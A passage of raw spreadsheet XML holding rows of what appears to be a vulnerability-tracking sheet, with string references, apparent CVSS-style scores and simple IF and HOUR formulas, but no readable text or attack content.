        <f>IF(out!$G293="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M293" s="4"/>
      <c r="N293" s="4"/>
      <c r="O293" s="13"/>
      <c r="P293" s="4"/>
      <c r="Q293" s="13">
        <f>HOUR(out!$P293 -out!$N293)</f>
        <v>0</v>
      </c>
      <c r="R293" s="18"/>
      <c r="S293" s="4"/>
      <c r="T293" s="4"/>
      <c r="U293" s="4"/>
      <c r="V293" s="7"/>
    </row>
    <row r="294" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A294" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B294" s="4" t="s">
        <v>1796</v>
      </c>
      <c r="C294" s="4" t="s">
        <v>1797</v>
      </c>
      <c r="D294" s="4" t="s">
        <v>1798</v>
      </c>
      <c r="E294" s="4" t="s">
        <v>1799</v>
      </c>
      <c r="F294" s="4" t="s">
        <v>1800</v>
      </c>
      <c r="G294" s="4" t="s">
        <v>1801</v>
      </c>
      <c r="H294" s="4">
        <v>7.5</v>
      </c>
      <c r="I294" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J294" s="4"/>
      <c r="K294" s="4"/>
      <c r="L294" s="4">
        <f>IF(out!$G294="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M294" s="4"/>
      <c r="N294" s="4"/>
      <c r="O294" s="13"/>
      <c r="P294" s="4"/>
      <c r="Q294" s="13">
        <f>HOUR(out!$P294 -out!$N294)</f>
        <v>0</v>
      </c>
      <c r="R294" s="18"/>
      <c r="S294" s="4"/>
      <c r="T294" s="4"/>
      <c r="U294" s="4"/>
      <c r="V294" s="7"/>
    </row>
    <row r="295" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A295" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B295" s="4" t="s">
        <v>1802</v>
      </c>
      <c r="C295" s="4" t="s">
        <v>1803</v>
      </c>
      <c r="D295" s="4" t="s">
        <v>1804</v>
      </c>
      <c r="E295" s="4" t="s">
        <v>1805</v>
      </c>
      <c r="F295" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G295" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H295" s="4">
        <v>7.5</v>
      </c>
      <c r="I295" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J295" s="4"/>
      <c r="K295" s="4"/>
      <c r="L295" s="4">
        <f>IF(out!$G295="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M295" s="4"/>
      <c r="N295" s="4"/>
      <c r="O295" s="13"/>
      <c r="P295" s="4"/>
      <c r="Q295" s="13">
        <f>HOUR(out!$P295 -out!$N295)</f>
        <v>0</v>
      </c>
      <c r="R295" s="18"/>
      <c r="S295" s="4"/>
      <c r="T295" s="4"/>
      <c r="U295" s="4"/>
      <c r="V295" s="7"/>
    </row>
    <row r="296" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A296" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B296" s="4" t="s">
        <v>1806</v>
      </c>
      <c r="C296" s="4" t="s">
        <v>1807</v>
      </c>
      <c r="D296" s="4" t="s">
        <v>1808</v>
      </c>
      <c r="E296" s="4" t="s">
        <v>1809</v>
      </c>
      <c r="F296" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G296" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H296" s="4">
        <v>7.5</v>
      </c>
      <c r="I296" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J296" s="4"/>
      <c r="K296" s="4"/>
      <c r="L296" s="4">
        <f>IF(out!$G296="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M296" s="4"/>
      <c r="N296" s="4"/>
      <c r="O296" s="13"/>
      <c r="P296" s="4"/>
      <c r="Q296" s="13">
        <f>HOUR(out!$P296 -out!$N296)</f>
        <v>0</v>
      </c>
      <c r="R296" s="18"/>
      <c r="S296" s="4"/>
      <c r="T296" s="4"/>
      <c r="U296" s="4"/>
      <c r="V296" s="7"/>
    </row>
    <row r="297" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A297" s="3" t="s">
        <v>1810</v>
      </c>
      <c r="B297" s="4" t="s">
        <v>1811</v>
      </c>
      <c r="C297" s="4" t="s">
        <v>1812</v>
      </c>
      <c r="D297" s="4" t="s">
        <v>1813</v>
      </c>
      <c r="E297" s="4" t="s">
        <v>1814</v>
      </c>
      <c r="F297" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G297" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H297" s="4">
        <v>7.1</v>
      </c>
      <c r="I297" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J297" s="4"/>
      <c r="K297" s="4"/>
      <c r="L297" s="4">
        <f>IF(out!$G297="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M297" s="4"/>
      <c r="N297" s="4"/>
      <c r="O297" s="13"/>
      <c r="P297" s="4"/>
      <c r="Q297" s="13">
        <f>HOUR(out!$P297 -out!$N297)</f>
        <v>0</v>
      </c>
      <c r="R297" s="18"/>
      <c r="S297" s="4"/>
      <c r="T297" s="4"/>
      <c r="U297" s="4"/>
      <c r="V297" s="7"/>
    </row>
    <row r="298" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A298" s="3" t="s">
        <v>1524</v>
      </c>
      <c r="B298" s="4" t="s">
        <v>1815</v>
      </c>
      <c r="C298" s="4" t="s">
        <v>1816</v>
      </c>
      <c r="D298" s="4" t="s">
        <v>1817</v>
      </c>
      <c r="E298" s="4" t="s">
        <v>1818</v>
      </c>
      <c r="F298" s="4" t="s">
        <v>1819</v>
      </c>
      <c r="G298" s="4" t="s">
        <v>1820</v>
      </c>
      <c r="H298" s="4">
        <v>8.4</v>
      </c>
      <c r="I298" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J298" s="4"/>
      <c r="K298" s="4"/>
      <c r="L298" s="4">
        <f>IF(out!$G298="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M298" s="4"/>
      <c r="N298" s="4"/>
      <c r="O298" s="13"/>
      <c r="P298" s="4"/>
      <c r="Q298" s="13">
        <f>HOUR(out!$P298 -out!$N298)</f>
        <v>0</v>
      </c>
      <c r="R298" s="18"/>
      <c r="S298" s="4"/>
      <c r="T298" s="4"/>
      <c r="U298" s="4"/>
      <c r="V298" s="7"/>
    </row>
    <row r="299" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A299" s="3" t="s">
        <v>1821</v>
      </c>
      <c r="B299" s="4" t="s">
        <v>1822</v>
      </c>
      <c r="C299" s="4" t="s">
        <v>1823</v>
      </c>
      <c r="D299" s="4" t="s">
        <v>1824</v>
      </c>
      <c r="E299" s="4" t="s">
        <v>1825</v>
      </c>
      <c r="F299" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G299" s="4" t="s">
        <v>1826</v>
      </c>
      <c r="H299" s="4">
        <v>8.1</v>
      </c>
      <c r="I299" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J299" s="4"/>
      <c r="K299" s="4"/>
      <c r="L299" s="4">
        <f>IF(out!$G299="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M299" s="4"/>
      <c r="N299" s="4"/>
      <c r="O299" s="13"/>
      <c r="P299" s="4"/>
      <c r="Q299" s="13">
        <f>HOUR(out!$P299 -out!$N299)</f>
        <v>0</v>
      </c>
      <c r="R299" s="18"/>
      <c r="S299" s="4"/>
      <c r="T299" s="4"/>
      <c r="U299" s="4"/>
      <c r="V299" s="7"/>
    </row>
    <row r="300" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A300" s="3" t="s">
        <v>1827</v>
      </c>
      <c r="B300" s="4" t="s">
        <v>1828</v>
      </c>
      <c r="C300" s="4" t="s">
        <v>1829</v>
      </c>
      <c r="D300" s="4" t="s">
        <v>1830</v>
      </c>
      <c r="E300" s="4" t="s">
        <v>1831</v>
      </c>
      <c r="F300" s="4" t="s">
        <v>1832</v>
      </c>
      <c r="G300" s="4" t="s">
        <v>1833</v>
      </c>
      <c r="H300" s="4">
        <v>6.2</v>
      </c>
      <c r="I300" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J300" s="4"/>
      <c r="K300" s="4"/>
      <c r="L300" s="4">
        <f>IF(out!$G300="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M300" s="4"/>
      <c r="N300" s="4"/>
      <c r="O300" s="13"/>
      <c r="P300" s="4"/>
      <c r="Q300" s="13">
        <f>HOUR(out!$P300 -out!$N300)</f>
        <v>0</v>
      </c>
      <c r="R300" s="18"/>
      <c r="S300" s="4"/>
      <c r="T300" s="4"/>
      <c r="U300" s="4"/>
      <c r="V300" s="7"/>
    </row>
    <row r="301" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A301" s="3" t="s">
        <v>1834</v>
      </c>
      <c r="B301" s="4" t="s">
        <v>1835</v>
      </c>
      <c r="C301" s="4" t="s">
        <v>1836</v>
      </c>
      <c r="D301" s="4" t="s">
        <v>1837</v>
      </c>
      <c r="E301" s="4" t="s">
        <v>1838</v>
      </c>
      <c r="F301" s="4" t="s">
        <v>1839</v>
      </c>
      <c r="G301" s="4" t="s">
        <v>1840</v>
      </c>
      <c r="H301" s="4">
        <v>4.8</v>
      </c>
      <c r="I301" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J301" s="4"/>
      <c r="K301" s="4"/>
      <c r="L301" s="4">
        <f>IF(out!$G301="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M301" s="4"/>
      <c r="N301" s="4"/>
      <c r="O301" s="13"/>
      <c r="P301" s="4"/>
      <c r="Q301" s="13">
        <f>HOUR(out!$P301 -out!$N301)</f>
        <v>0</v>
      </c>
      <c r="R301" s="18"/>
      <c r="S301" s="4"/>
      <c r="T301" s="4"/>
      <c r="U301" s="4"/>
      <c r="V301" s="7"/>
    </row>
    <row r="302" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A302" s="3" t="s">
        <v>1587</v>
      </c>
      <c r="B302" s="4" t="s">
        <v>1841</v>
      </c>
      <c r="C302" s="4" t="s">
        <v>1842</v>
      </c>
      <c r="D302" s="4" t="s">
        <v>1843</v>
      </c>
      <c r="E302" s="4" t="s">
        <v>1844</v>
      </c>
      <c r="F302" s="4" t="s">
        <v>1845</v>
      </c>
      <c r="G302" s="4" t="s">
        <v>1846</v>
      </c>
      <c r="H302" s="4">
        <v>7.5</v>
      </c>
      <c r="I302" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J302" s="4"/>
      <c r="K302" s="4"/>
      <c r="L302" s="4">
        <f>IF(out!$G302="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M302" s="4"/>
      <c r="N302" s="4"/>
      <c r="O302" s="13"/>
      <c r="P302" s="4"/>
      <c r="Q302" s="13">
        <f>HOUR(out!$P302 -out!$N302)</f>
        <v>0</v>
      </c>
      <c r="R302" s="18"/>
      <c r="S302" s="4"/>
      <c r="T302" s="4"/>
      <c r="U302" s="4"/>
      <c r="V302" s="7"/>
    </row>
    <row r="303" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A303" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B303" s="4" t="s">
        <v>1847</v>
      </c>
      <c r="C303" s="4" t="s">
        <v>1848</v>
      </c>
      <c r="D303" s="4" t="s">
        <v>1849</v>
      </c>
      <c r="E303" s="4" t="s">
        <v>1850</v>
      </c>
      <c r="F303" s="4" t="s">
        <v>1851</v>
      </c>
      <c r="G303" s="4" t="s">
        <v>1852</v>
      </c>
      <c r="H303" s="4">
        <v>5.3</v>
      </c>
      <c r="I303" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J303" s="4"/>
      <c r="K303" s="4"/>
      <c r="L303" s="4">
        <f>IF(out!$G303="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M303" s="4"/>
      <c r="N303" s="4"/>
      <c r="O303" s="13"/>
      <c r="P303" s="4"/>
      <c r="Q303" s="13">
        <f>HOUR(out!$P303 -out!$N303)</f>
        <v>0</v>
      </c>
      <c r="R303" s="18"/>
      <c r="S303" s="4"/>
      <c r="T303" s="4"/>
      <c r="U303" s="4"/>
      <c r="V303" s="7"/>
    </row>
    <row r="304" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A304" s="3" t="s">
        <v>1853</v>
      </c>
      <c r="B304" s="4" t="s">
        <v>1854</v>
      </c>
      <c r="C304" s="4" t="s">
        <v>1855</v>
      </c>
      <c r="D304" s="4" t="s">
        <v>1856</v>
      </c>
      <c r="E304" s="4" t="s">
        <v>1857</v>
      </c>
      <c r="F304" s="4" t="s">
        <v>212</v>
      </c>
      <c r="G304" s="4" t="s">
        <v>213</v>
      </c>
      <c r="H304" s="4">
        <v>3.7</v>
      </c>
      <c r="I304" s="4" t="s">
        <v>71</v>
      </c>
      <c r="J304" s="4"/>
      <c r="K304" s="4"/>
      <c r="L304" s="4">
        <f>IF(out!$G304="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M304" s="4"/>
      <c r="N304" s="4"/>
      <c r="O304" s="13"/>
      <c r="P304" s="4"/>
      <c r="Q304" s="13">
        <f>HOUR(out!$P304 -out!$N304)</f>
        <v>0</v>
      </c>
      <c r="R304" s="18"/>
      <c r="S304" s="4"/>
      <c r="T304" s="4"/>
      <c r="U304" s="4"/>
      <c r="V304" s="7"/>
    </row>
    <row r="305" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A305" s="3" t="s">
        <v>1858</v>
      </c>
      <c r="B305" s="4" t="s">
        <v>1859</v>
      </c>
      <c r="C305" s="4" t="s">
        <v>1860</v>
      </c>
      <c r="D305" s="4" t="s">
        <v>1861</v>
      </c>
      <c r="E305" s="4" t="s">
        <v>1862</v>
      </c>
      <c r="F305" s="4" t="s">
        <v>1863</v>
      </c>
      <c r="G305" s="4" t="s">
        <v>213</v>
      </c>
      <c r="H305" s="4">
        <v>5.3</v>
      </c>
      <c r="I305" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J305" s="4"/>
      <c r="K305" s="4"/>
      <c r="L305" s="4">
        <f>IF(out!$G305="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M305" s="4"/>
      <c r="N305" s="4"/>
      <c r="O305" s="13"/>
      <c r="P305" s="4"/>
      <c r="Q305" s="13">
        <f>HOUR(out!$P305 -out!$N305)</f>
        <v>0</v>
      </c>
      <c r="R305" s="18"/>
      <c r="S305" s="4"/>
      <c r="T305" s="4"/>
      <c r="U305" s="4"/>
      <c r="V305" s="7"/>
    </row>
    <row r="306" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A306" s="3" t="s">
        <v>519</v>
      </c>
      <c r="B306" s="4" t="s">
        <v>1864</v>
      </c>
      <c r="C306" s="4" t="s">
        <v>1865</v>
      </c>
      <c r="D306" s="4" t="s">
        <v>1866</v>
      </c>
      <c r="E306" s="4" t="s">
        <v>1867</v>
      </c>
      <c r="F306" s="4" t="s">
        <v>1868</v>
      </c>
      <c r="G306" s="4" t="s">
        <v>1869</v>
      </c>
      <c r="H306" s="4">
        <v>5.3</v>
      </c>
      <c r="I306" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J306" s="4"/>
      <c r="K306" s="4"/>
      <c r="L306" s="4">
        <f>IF(out!$G306="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M306" s="4"/>
      <c r="N306" s="4"/>
      <c r="O306" s="13"/>
      <c r="P306" s="4"/>
      <c r="Q306" s="13">
        <f>HOUR(out!$P306 -out!$N306)</f>
        <v>0</v>
      </c>
      <c r="R306" s="18"/>
      <c r="S306" s="4"/>
      <c r="T306" s="4"/>
      <c r="U306" s="4"/>
      <c r="V306" s="7"/>
    </row>
    <row r="307" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A307" s="3" t="s">
        <v>475</v>
      </c>
      <c r="B307" s="4" t="s">
        <v>1870</v>
      </c>
      <c r="C307" s="4" t="s">
        <v>1871</v>
      </c>
      <c r="D307" s="4" t="s">
        <v>1872</v>
      </c>
      <c r="E307" s="4" t="s">
        <v>1873</v>
      </c>
      <c r="F307" s="4" t="s">
        <v>1874</v>
      </c>
      <c r="G307" s="4" t="s">
        <v>1875</v>
      </c>
      <c r="H307" s="4">
        <v>7.5</v>
      </c>
      <c r="I307" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J307" s="4"/>
      <c r="K307" s="4"/>
      <c r="L307" s="4">
        <f>IF(out!$G307="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M307" s="4"/>
      <c r="N307" s="4"/>
      <c r="O307" s="13"/>
      <c r="P307" s="4"/>
      <c r="Q307" s="13">
        <f>HOUR(out!$P307 -out!$N307)</f>
        <v>0</v>
      </c>
      <c r="R307" s="18"/>
      <c r="S307" s="4"/>
      <c r="T307" s="4"/>
      <c r="U307" s="4"/>
      <c r="V307" s="7"/>
    </row>
    <row r="308" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A308" s="3" t="s">
        <v>1876</v>
      </c>
      <c r="B308" s="4" t="s">
        <v>1877</v>
      </c>
      <c r="C308" s="4" t="s">
        <v>1878</v>
      </c>
      <c r="D308" s="4" t="s">
        <v>1879</v>
      </c>
      <c r="E308" s="4" t="s">
        <v>1880</v>
      </c>
      <c r="F308" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G308" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H308" s="4">
        <v>4</v>
      </c>
      <c r="I308" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J308" s="4"/>
      <c r="K308" s="4"/>
      <c r="L308" s="4">
        <f>IF(out!$G308="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M308" s="4"/>
      <c r="N308" s="4"/>
      <c r="O308" s="13"/>
      <c r="P308" s="4"/>
      <c r="Q308" s="13">
        <f>HOUR(out!$P308 -out!$N308)</f>
        <v>0</v>
      </c>
      <c r="R308" s="18"/>
      <c r="S308" s="4"/>
      <c r="T308" s="4"/>
      <c r="U308" s="4"/>
      <c r="V308" s="7"/>
    </row>
    <row r="309" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A309" s="3" t="s">
        <v>481</v>
      </c>
      <c r="B309" s="4" t="s">
        <v>1881</v>
      </c>
      <c r="C309" s="4" t="s">
        <v>1882</v>
      </c>
      <c r="D309" s="4" t="s">
        <v>1883</v>
      </c>
      <c r="E309" s="4" t="s">
        <v>1884</v>
      </c>
      <c r="F309" s="4" t="s">
        <v>1885</v>
      </c>
      <c r="G309" s="4" t="s">
        <v>1787</v>
      </c>
      <c r="H309" s="4">
        <v>7.5</v>
      </c>
      <c r="I309" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J309" s="4"/>
      <c r="K309" s="4"/>
      <c r="L309" s="4">
        <f>IF(out!$G309="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M309" s="4"/>
      <c r="N309" s="4"/>
      <c r="O309" s="13"/>
      <c r="P309" s="4"/>
      <c r="Q309" s="13">
        <f>HOUR(out!$P309 -out!$N309)</f>
        <v>0</v>
      </c>
      <c r="R309" s="18"/>
      <c r="S309" s="4"/>
      <c r="T309" s="4"/>
      <c r="U309" s="4"/>
      <c r="V309" s="7"/>
    </row>
    <row r="310" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A310" s="3" t="s">
        <v>1886</v>
      </c>
      <c r="B310" s="4" t="s">
        <v>1887</v>
      </c>
      <c r="C310" s="4" t="s">
        <v>1888</v>
      </c>
      <c r="D310" s="4" t="s">
        <v>1889</v>
      </c>
      <c r="E310" s="4" t="s">
        <v>1890</v>
      </c>
      <c r="F310" s="4" t="s">
        <v>416</v>
      </c>
      <c r="G310" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H310" s="4">
        <v>6.5</v>
      </c>
      <c r="I310" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J310" s="4"/>
      <c r="K310" s="4"/>
      <c r="L310" s="4">
        <f>IF(out!$G310="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M310" s="4"/>
      <c r="N310" s="4"/>
      <c r="O310" s="13"/>
      <c r="P310" s="4"/>
      <c r="Q310" s="13">
        <f>HOUR(out!$P310 -out!$N310)</f>
        <v>0</v>
      </c>
      <c r="R310" s="18"/>
      <c r="S310" s="4"/>
      <c r="T310" s="4"/>
      <c r="U310" s="4"/>
      <c r="V310" s="7"/>
    </row>
    <row r="311" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A311" s="3" t="s">
        <v>1891</v>
      </c>
      <c r="B311" s="4" t="s">
        <v>1892</v>
      </c>
      <c r="C311" s="4" t="s">
        <v>1893</v>
      </c>
      <c r="D311" s="4" t="s">
        <v>1894</v>
      </c>
      <c r="E311" s="4" t="s">
        <v>1895</v>
      </c>
      <c r="F311" s="4" t="s">
        <v>593</v>
      </c>
      <c r="G311" s="4" t="s">
        <v>213</v>
      </c>
      <c r="H311" s="4">
        <v>7.5</v>
      </c>
      <c r="I311" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J311" s="4"/>
      <c r="K311" s="4"/>
      <c r="L311" s="4">
        <f>IF(out!$G311="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M311" s="4"/>
      <c r="N311" s="4"/>
      <c r="O311" s="13"/>
      <c r="P311" s="4"/>
      <c r="Q311" s="13">
        <f>HOUR(out!$P311 -out!$N311)</f>
        <v>0</v>
      </c>
      <c r="R311" s="18"/>
      <c r="S311" s="4"/>
      <c r="T311" s="4"/>
      <c r="U311" s="4"/>
      <c r="V311" s="7"/>
    </row>
    <row r="312" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A312" s="3" t="s">
        <v>1896</v>
      </c>
      <c r="B312" s="4" t="s">
        <v>1897</v>
      </c>
      <c r="C312" s="4" t="s">
        <v>1898</v>
      </c>
      <c r="D312" s="4" t="s">
        <v>1899</v>
      </c>
      <c r="E312" s="4" t="s">
        <v>1900</v>
      </c>
      <c r="F312" s="4" t="s">
        <v>1901</v>
      </c>
      <c r="G312" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H312" s="4">
        <v>6.5</v>
      </c>
      <c r="I312" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J312" s="4"/>
      <c r="K312" s="4"/>
      <c r="L312" s="4">
        <f>IF(out!$G312="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M312" s="4"/>
      <c r="N312" s="4"/>
      <c r="O312" s="13"/>
      <c r="P312" s="4"/>
      <c r="Q312" s="13">
        <f>HOUR(out!$P312 -out!$N312)</f>
        <v>0</v>
      </c>
      <c r="R312" s="18"/>
      <c r="S312" s="4"/>
      <c r="T312" s="4"/>
      <c r="U312" s="4"/>
      <c r="V312" s="7"/>
    </row>
    <row r="313" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A313" s="3" t="s">
        <v>1902</v>
      </c>
      <c r="B313" s="4" t="s">
        <v>1903</v>
      </c>
      <c r="C313" s="4" t="s">
        <v>1904</v>
      </c>
      <c r="D313" s="4" t="s">
        <v>1905</v>
      </c>
      <c r="E313" s="4" t="s">
        <v>1906</v>
      </c>
      <c r="F313" s="4" t="s">
        <v>1907</v>
      </c>
      <c r="G313" s="4" t="s">
        <v>929</v>
      </c>
      <c r="H313" s="4">
        <v>3.8</v>
      </c>
      <c r="I313" s="4" t="s">
        <v>71</v>
      </c>
      <c r="J313" s="4"/>
      <c r="K313" s="4"/>
      <c r="L313" s="4">
        <f>IF(out!$G313="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M313" s="4"/>
      <c r="N313" s="4"/>
      <c r="O313" s="13"/>
      <c r="P313" s="4"/>
      <c r="Q313" s="13">
        <f>HOUR(out!$P313 -out!$N313)</f>
        <v>0</v>
      </c>
      <c r="R313" s="18"/>
      <c r="S313" s="4"/>
      <c r="T313" s="4"/>
      <c r="U313" s="4"/>
      <c r="V313" s="7"/>
    </row>
    <row r="314" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A314" s="3" t="s">
        <v>1908</v>
      </c>
      <c r="B314" s="4" t="s">
        <v>1909</v>
      </c>
      <c r="C314" s="4" t="s">
        <v>1910</v>
      </c>
      <c r="D314" s="4" t="s">
        <v>1911</v>
      </c>
      <c r="E314" s="4" t="s">
        <v>1912</v>
      </c>
      <c r="F314" s="4" t="s">
        <v>1913</v>
      </c>
      <c r="G314" s="4" t="s">
        <v>1914</v>
      </c>
      <c r="H314" s="4">
        <v>6.5</v>
      </c>
      <c r="I314" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J314" s="4"/>
      <c r="K314" s="4"/>
      <c r="L314" s="4">
        <f>IF(out!$G314="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M314" s="4"/>
      <c r="N314" s="4"/>
      <c r="O314" s="13"/>
      <c r="P314" s="4"/>
      <c r="Q314" s="13">
        <f>HOUR(out!$P314 -out!$N314)</f>
        <v>0</v>
      </c>
      <c r="R314" s="18"/>
      <c r="S314" s="4"/>
      <c r="T314" s="4"/>
      <c r="U314" s="4"/>
      <c r="V314" s="7"/>
    </row>
    <row r="315" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A315" s="3" t="s">
        <v>1902</v>
      </c>
      <c r="B315" s="4" t="s">
        <v>1915</v>
      </c>
      <c r="C315" s="4" t="s">
        <v>1916</v>
      </c>
      <c r="D315" s="4" t="s">
        <v>1917</v>
      </c>
      <c r="E315" s="4" t="s">
        <v>1918</v>
      </c>
      <c r="F315" s="4" t="s">
        <v>1919</v>
      </c>
      <c r="G315" s="4" t="s">
        <v>1920</v>
      </c>
      <c r="H315" s="4">
        <v>5.4</v>
      </c>
      <c r="I315" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J315" s="4"/>
      <c r="K315" s="4"/>
      <c r="L315" s="4">
        <f>IF(out!$G315="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M315" s="4"/>
      <c r="N315" s="4"/>
      <c r="O315" s="13"/>
      <c r="P315" s="4"/>
      <c r="Q315" s="13">
        <f>HOUR(out!$P315 -out!$N315)</f>
        <v>0</v>
      </c>
      <c r="R315" s="18"/>
      <c r="S315" s="4"/>
      <c r="T315" s="4"/>
      <c r="U315" s="4"/>
      <c r="V315" s="7"/>
    </row>
    <row r="316" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A316" s="3" t="s">
        <v>1902</v>
      </c>
      <c r="B316" s="4" t="s">
        <v>1921</v>
      </c>
      <c r="C316" s="4" t="s">
        <v>1922</v>
      </c>
      <c r="D316" s="4" t="s">
        <v>1917</v>
      </c>
      <c r="E316" s="4" t="s">
        <v>1918</v>
      </c>
      <c r="F316" s="4" t="s">
        <v>1923</v>
      </c>
      <c r="G316" s="4" t="s">
        <v>1924</v>
      </c>
      <c r="H316" s="4">
        <v>5.4</v>
      </c>
      <c r="I316" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J316" s="4"/>
      <c r="K316" s="4"/>
      <c r="L316" s="4">
        <f>IF(out!$G316="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M316" s="4"/>
      <c r="N316" s="4"/>
      <c r="O316" s="13"/>
      <c r="P316" s="4"/>
      <c r="Q316" s="13">
        <f>HOUR(out!$P316 -out!$N316)</f>
        <v>0</v>
      </c>
      <c r="R316" s="18"/>
      <c r="S316" s="4"/>
      <c r="T316" s="4"/>
      <c r="U316" s="4"/>
      <c r="V316" s="7"/>
    </row>
    <row r="317" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A317" s="3" t="s">
        <v>1524</v>
      </c>
      <c r="B317" s="4" t="s">
        <v>1925</v>
      </c>
      <c r="C317" s="4" t="s">
        <v>1926</v>
      </c>
      <c r="D317" s="4" t="s">
        <v>1527</v>
      </c>
      <c r="E317" s="4" t="s">
        <v>1528</v>
      </c>
      <c r="F317" s="4" t="s">
        <v>530</v>
      </c>
      <c r="G317" s="4" t="s">
        <v>531</v>
      </c>
      <c r="H317" s="4">
        <v>10</v>
      </c>
      <c r="I317" s="4" t="s">
        <v>85</v>
      </c>
      <c r="J317" s="4"/>
      <c r="K317" s="4"/>
      <c r="L317" s="4">
        <f>IF(out!$G317="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M317" s="4"/>
      <c r="N317" s="4"/>
      <c r="O317" s="13"/>
      <c r="P317" s="4"/>
      <c r="Q317" s="13">
        <f>HOUR(out!$P317 -out!$N317)</f>
        <v>0</v>
      </c>
      <c r="R317" s="18"/>
      <c r="S317" s="4"/>
      <c r="T317" s="4"/>
      <c r="U317" s="4"/>
      <c r="V317" s="7"/>
    </row>
    <row r="318" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A318" s="3" t="s">
        <v>1927</v>
      </c>
      <c r="B318" s="4" t="s">
        <v>1928</v>
      </c>
      <c r="C318" s="4" t="s">
        <v>1929</v>
      </c>
      <c r="D318" s="4" t="s">
        <v>1930</v>
      </c>
      <c r="E318" s="4" t="s">
        <v>1931</v>
      </c>
      <c r="F318" s="4" t="s">
        <v>1932</v>
      </c>
      <c r="G318" s="4" t="s">
        <v>1933</v>
      </c>
      <c r="H318" s="4">
        <v>5.3</v>
      </c>
      <c r="I318" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J318" s="4"/>
      <c r="K318" s="4"/>
      <c r="L318" s="4">
        <f>IF(out!$G318="None",1,0)</f>
